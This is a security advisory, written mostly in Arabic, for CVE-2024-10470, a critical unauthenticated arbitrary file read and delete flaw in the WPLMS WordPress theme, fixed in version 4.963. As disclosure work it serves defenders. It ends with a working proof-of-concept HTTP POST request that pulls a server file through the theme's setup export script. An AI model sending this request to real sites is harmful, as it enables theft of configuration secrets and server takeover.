
WPLMS نظام إدارة التعلم لووردبريس <= 4.962 – قراءة وحذف ملفات عشوائية بدون مصادقة
WPLMS نظام إدارة التعلم لووردبريس <= 4.962 – قراءة وحذف ملفات عشوائية بدون مصادقة
نظام WPLMS لإدارة التعلم لووردبريس، قالب WordPress LMS لووردبريس، عرضة لقراءة وحذف ملفات عشوائية بسبب عدم كفاية التحقق من مسار الملف وأذونات الوصول في دالتي readfile و unlink في جميع الإصدارات حتى 4.962. وهذا يسمح للمهاجمين غير المصادق عليهم بحذف ملفات عشوائية على الخادم، مما قد يؤدي بسهولة إلى تنفيذ تعليمات برمجية عن بعد عند حذف الملف المناسب (مثل wp-config.php). القالب معرض للخطر حتى عندما لا يكون نشطًا.
Affected Theme: WPLMS Learning Management System for WordPress
Theme Slug: wplms
Affected Versions: <= 4.962
CVE ID: CVE-2024-10470
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Foxyyy
Fully Patched Version: 4.963
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
download_export_zip=1&zip_file=.htaccess